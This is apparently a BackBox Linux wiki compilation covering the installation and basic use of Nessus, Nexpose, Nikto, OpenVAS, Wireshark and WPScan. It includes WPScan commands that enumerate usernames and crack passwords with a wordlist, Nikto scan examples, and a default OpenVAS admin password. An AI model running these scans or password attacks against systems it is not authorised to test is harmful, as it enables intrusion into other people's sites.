backbox@backbox:~/weevely-0.5$ debuild -S
backbox@backbox:~/weevely-0.5$ cd ..
backbox@backbox:~$ dput ppa:user/ppa-name weevely_0.5-0backbox1_source.changes

Nessus
This is the approved revision of this page, as well as being the most recent.

Contents [hide]
1 Background
2 Installation
3 Configuration
3.1 Create a Nessus User
3.2 Installing the Plugin Activation Code
3.3 Start / Stop / Restart the Nessus daemon
3.4 Updating plugins
4 Connecting with a client
5 Removing Nessus

Background
Nessus is a powerful, up-to-date and easy to use network security scanner. It is currently rated
among the top products of its type throughout the security industry and is endorsed by professional
information security organizations such as the SANS Institute. Nessus allows you to remotely audit
a given network and determine if it has been broken into or misused in some way. Nessus also
provides the ability to locally audit a specific machine for vulnerabilities, compliance specifications,
content policy violations and more.

Installation
Download the latest version of Nessus from http://www.nessus.org/download/ . Confirm the
integrity of the installation package by comparing the download MD5 checksum with the one listed
in the MD5.asc file here .
Use one of the appropriate commands below that corresponds to the version of Ubuntu you are
running:
sudo dpkg -i Nessus-4.4.0-ubuntu1010_amd64.deb
sudo dpkg -i Nessus-4.4.0-ubuntu1010_i386.deb

Configuration
Create a Nessus User
At a minimum, create one Nessus user so client utilities can log into Nessus to initiate scans and
retrieve results.
For password authentication use the nessus-adduser command to add users. For the first user
created, it is recommended to be the admin user.
sudo /opt/nessus/sbin/nessus-adduser
Login : backbox
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins,
etc...) (y/n) [n]: y
User rules
---------nessusd has a rules system which allows you to restrict the hosts that

backbox has the right to test. For instance, you may want him to be able
to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done:
(the user can have an empty rules set)
Login : backbox
Password : ***********
This user will have 'admin' privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
User added

Installing the Plugin Activation Code

Before Nessus starts for the first time, you must provide an Activation Code to download the
current plugins. The initial download and processing of plugins will require extra time before the
Nessus server is ready.
Depending on your subscription service, you will have received an Activation Code that entitles you
to receive either the ProfessionalFeed or the HomeFeed plugins. This synchronizes your Nessus
scanner with all available plugins. Activation Codes may be 16 or 20 character alpha-numeric
strings with dashes.
To register for the HomeFeed, visit http://www.nessus.org/register/
Nessus to use the HomeFeed.

and register your copy of

To install the Activation Code, type the following command on the system running Nessus,
whereXXXX-XXXX-XXXX-XXXX-XXXX is the registration code that you received:
sudo /opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX
Your activation code has been registered properly thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.

Start / Stop / Restart the Nessus daemon

Start, stop or restart the Nessus service as root with the following command:
sudo /etc/init.d/nessusd { start | stop | restart }
or simply:
Services --> nessus --> nessusd { start | stop | restart }

Updating plugins
The following command is used to update the Nessus scanner with the most recent plugins:
sudo /opt/nessus/sbin/nessus-update-plugins
The first time Nessus updates and processes the plugins, it may take several minutes. The web

server will show a Nessus is initializing. message and will reload when ready.

Connecting with a client

Once the installation has finished and the plugins have been updated and processed, the Nessus
server is ready to be connected to by a client. Tenable supports access to the Nessus server
through a native web server:
https://localhost:8834/
To do that navigate through the menu and:
Auditing > Vulnerability Assessment > Network Assessment > Nessus
The first time you connect to the web interface, your browser may display a warning about an
untrusted connection. This is due to Nessus shipping with a default SSL certificate. More
information on this can be found in the Nessus User Guide.

Removing Nessus
sudo apt-get purge nessus

Category: Network Assessment

Nexpose
This is the approved revision of this page, as well as being the most recent.

The Nexpose Community Edition is a free, single-user vulnerability management solution specifically
designed for very small organizations or individual use.

Download and Installation

Lets start first by getting free community edition for personal use from:
http://www.rapid7.com/vulnerability-scanner.jsp
The installation process is the same for 32-bit as well as 64-bit architecture. It requires some
libraries/tools that it have dependency so, lets go to in stall these dependencies first.
It requires the following packages.
screen
libstdc++5 (32-bit only)
Then proceed with:
sudo -i
apt-get install screen && apt-get install libstdc++5
wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux32.bin
chmod +x NeXposeSetup-Linux32.bin
./NeXposeSetup-Linux32.bin -c
The installer will display some info and it will prompt you some confirmation about Nexpose. Just go
ahead by typing y and then press ENTER. Once the above process done you will be asked about the
creation of an account to get NeXpose user key. Check your mail for product key that you have
registered for and go forward.

Minimum System Requirements

Nexpose Community Edition recommend the following system requirements:
2 GHz processor or higher
2-4 GB (32bit), 4-8 GB RAM (64bit)
10 GB + available disk space
English operating systems with English/United States regional settings
100 Mbps network interface card
Category: Network Assessment

Nikto
This is the approved revision of this page, as well as being the most recent.

Contents [hide]
1 Nikto Web Scanner
1.1 Description
1.2 Usage
1.3 Example Usage

Nikto Web Scanner

Home page: http://cirt.net/nikto2
Basic Usage: http://cirt.net/nikto2-docs/usage.html

Description
Nikto is a open source tool . Is writed in Perl . This tool, is used for the vulnerability assesment and
auditing of web site . Works with a large database of vulnerability, updated monthly .

Usage
nikto -Help
Show the tool options .

Example Usage
nikto -h WEB_SITE
With this command, nikto scan the "WEB SITE" on port 80 .
If you want specific port
nikto -h WEB_SITE -p PORT
Where instead the "PORT", write the port where you want the scan .
If you want scan a range of port
nikto -h WEB_SITE -p PORT1,PORT2,PORT3
Add the option -ssl if the host scanned use a https protocoll and works with ssl .
You can choose whic bug you wanto to find, with a -Tuning parameter
nikto -Tuning 123 -h localhost
This is a list of vulnerability supported by Nikto
0 - File Upload
1 - Interesting File / Seen in logs
2 - Misconfiguration / Default File
3 - Information Disclosure
4 - Injection (XSS/Script/HTML)

5 - Remote File Retrieval - Inside Web Root

6 - Denial of Service
7 - Remote File Retrieval - Server Wide
8 - Command Execution / Remote Shell
9 - SQL Injection
a - Authentication Bypass
b - Software Identification
g - Generic (Don't rely on banner)
x - Reverse Tuning Options (i.e., include all except specified)
Update nikto :
nikto -update
This software is used to show the bug, but not to exploit this .
Category: Web Application Assessment

OpenVAS
This is the approved revision of this page, as well as being the most recent.

The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and
tools offering a comprehensive and powerful vulnerability scanning and vulnerability management
solution.
The actual security scanner is accompanied with a daily updated feed of Network Vulnerability
Tests (NVTs), over 30,000 in total (as of April 2013).
All OpenVAS products are Free Software. Most components are licensed under the GNU General
Public License (GNU GPL).
The core of this SSL-secured service-oriented architecture is the OpenVAS Scanner. The scanner
very efficiently executes the actual Network Vulnerability Tests (NVTs) which are served with daily
updates via the OpenVAS NVT Feed or via a commercial feed service.
The OpenVAS Manager is the central service that consolidates plain vulnerability scanning into a
full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS
Transfer Protocol) and itself offers the XML-based, stateless OpenVAS Management Protocol
(OMP). All intelligence is implemented in the Manager so that it is possible to implement various
lean clients that will behave consistently e.g. with regard to filtering or sorting scan results. The
Manager also controls a SQL database (sqlite-based) where all configuration and scan result data is
centrally stored.
The Greenbone Security Assistant (GSA) is a lean web service offering a user interface for web
browsers. GSA uses XSL transformation stylesheet that converts OMP responses into HTML.
OpenVAS CLI contains the command line tool "omp" which allows to create batch processes to
drive OpenVAS Manager.
The OpenVAS Administrator acts as a command line tool or as a full service daemon offering the
OpenVAS Administration Protocol (OAP). The most important tasks are the user management and
feed management. GSA support OAP and users with the role "Admin" can access the OAP
functionality.

Quick Install
With the default installation of BackBox some user may experience some issues while starting
OpenVAS. If that is the case the solution to fix the issue is to update the tool, as following
instructions from the terminal board:

sudo -s
openvas-service stop
apt-get purge greenbone-security-assistant openvas-cli openvas-manager openvas-scanner openvas-administrator
apt-get autoremove --purge
rm -rf /var/lib/openvas/
apt-get update
apt-get dist-upgrade
apt-get install greenbone-security-assistant openvas-cli openvas-manager openvas-scanner openvas-administrator sqlite3 xsltproc rsync
To install support packages for generation of the reports (downloads around 30 MB of additional
packages):
apt-get install texlive-latex-base texlive-latex-extra texlive-latex-recommended htmldoc
To install support for autogenerated LSC credential packages:
apt-get install alien rpm nsis fakeroot

Quick Start
(copy and paste whole block as user root, during first the time you will be prompted to set the
password for user "admin")
sudo -s
test -e /var/lib/openvas/CA/cacert.pem || openvas-mkcert -q
openvas-nvt-sync
test -e /var/lib/openvas/users/om || openvas-mkcert-client -n om -i
service openvas-manager stop
service openvas-scanner stop
openvassd
openvasmd --migrate
openvasmd --rebuild
openvas-scapdata-sync
openvas-certdata-sync
test -e /var/lib/openvas/users/admin || openvasad -c add_user -n admin -r Admin
killall openvassd
sleep 15
service openvas-scanner start
service openvas-manager start
service openvas-administrator restart
service greenbone-security-assistant restart

Basic Usage

To start OpenVAS GSA session you will need to start all the related services. To do this navigate
through BackBox main menu and click on:
Services > openvas > openvas-services restart
or simply perform in command line:
sudo openvas-services start
then wait until the following info are displayed on your terminal:
Starting OpenVAS Scanner: openvassd.
Starting OpenVAS Manager: openvasmd.
Starting OpenVAS Administrator: openvasad.
Starting Greenbone Security Assistant: gsad.
Done.
Once you got the service started you can proceed by starting OpenVAS GSA web-interface. To do
that navigate through the menu:
Auditing > Vulnerability Assessment > Network > OpenVAS GSA
or simply open you browser on:
https://localhost:9392
You will be prompted the login interface on your browser. BackBox has default username (admin)
and password (backbox) to access, just enter these access parameters in order to log into the web
application interface.
You will finally have the OpenVAS Web UI running and you can start to perform your scannings (or
whatever you'd like to do).
Enjoy your assessment...
Category: Network Assessment

Wireshark
This is the approved revision of this page, as well as being the most recent.

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis,
software and communications protocol development, and education

How to Run
For security reason, is not recommended run Wireshark with root privilages. To start this then, you
must first run a few commands...
In a terminal (very important that you're in a terminal, not just the Alt+F2 dialogue) run this:
$ sudo dpkg-reconfigure wireshark-common
This will ask you if you want to allow non-root user to be able to sniff. That's what we're aiming for, so
select Yes and hit return.
This adds a wireshark group. Anybody in that group will be able to sniff without being root.
Add your username to group wireshark:
$ sudo adduser $USER wireshark
Logout on your system, and login again.
Now, open terminal and give the command:
$ wireshark
or click on BackBox Menu:
Auditing -> Privilege Escalation -> Sniffing -> Wireshark
and select the interface to sniff .
Category: Sniffing

Wpscan
This is the approved revision of this page, as well as being the most recent.

WPScan - Wordpress Security Scanner

Source code web site: http://code.google.com/p/wpscan/

Description
WPScan is a black box WordPress Security Scanner written in Ruby which attempts to find known
security weaknesses within WordPress installations. Its intended use it to be for security
professionals or WordPress administrators to asses the security posture of their WordPress
installations. The code base is Open Source and licensed under the GPLv3.
Features include:
Username enumeration (from author)
Weak password cracking (multithreaded)
Version enumeration (from generator meta tag)
Vulnerability enumeration (based on version)
Plugin enumeration (todo)
Plugin vulnerability enumeration (based on version) (todo)
Other miscellaneous checks

Example usage
Examples:
wpscan.rb --url www.example.com
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --sername admin

Category: Web Applications Exploitation